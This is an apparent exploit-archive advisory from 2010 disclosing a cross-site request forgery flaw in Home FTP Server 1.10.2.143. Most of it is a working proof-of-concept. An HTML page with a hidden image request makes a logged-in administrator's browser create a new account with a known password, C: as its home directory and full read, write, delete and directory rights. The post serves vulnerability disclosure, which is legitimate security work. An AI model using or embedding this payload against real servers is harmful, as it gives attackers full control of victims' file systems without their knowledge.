homeftp-xsrf.txt
Posted on 27 May 2010
<!--=========================================================================================================# # _ _ __ __ __ _______ _____ __ __ _____ _ _ _____ __ __ # # /_/ /\_ /\_ /\_ /\_ /\_______) ) ___ ( /_/\__/ ) ___ ( /_/ /\_ /\_____/_/\__/ # # ) ) )( ( ( /_/( ( ( ( ( ( (___ __// /\_/ ) ) ) ) )/ /\_/ ) ) )( ( (( (_____/) ) ) ) ) # # /_/ //\ \_ /\_\ \_ \_ / / / / /_/ (_ /_/ /_/ // /_/ (_ /_/ //\ \_\ \__ /_/ /_/_/ # # / / // / // / /__ / / /__ ( ( ( )_/ / / \_/ )_/ / / / / // /__/_ # # )_) / (_(( (_(( (_____(( (_____( /_/ / )_) ) /_/ / )_) / (_(( (_____)_) ) # # \_/ /_/ /_/ /_____/ /_____/ /_/_/ )_____( \_/ )_____( \_/ /_/ /_____/\_/ \_/ # # # #============================================================================================================# # # # Vulnerability............Cross-site Request Forgery # # Software.................Home FTP Server 1.10.2.143 # # Download.................http://downstairs.dnsalias.net/files/HomeFtpServerInstall.exe # # Date.....................5/25/10 # # # #============================================================================================================# # # # Site.....................http://cross-site-scripting.blogspot.com/ # # Email....................john.leitch5@gmail.com # # # #============================================================================================================# # # # ##Description## # # # # A cross-site request forgery vulnerability in Home FTP Server 1.10.2.143 can be exploited via GET request # # to create an admin account with all permissions (read, write, delete, etc.) # # # # # # ##Proof of Concept## # # --> <html> <body> <img src="http://localhost/?addnewmember=new_user&pass=Password1&home=c:&allowdownload=on&allowupload=on&allowrename=on&allowdeletefile=on&allowchangedir=on&allowcreatedir=on&allowdeletedir=on&virtualdir=&filecontrol=" /> </body> </html>
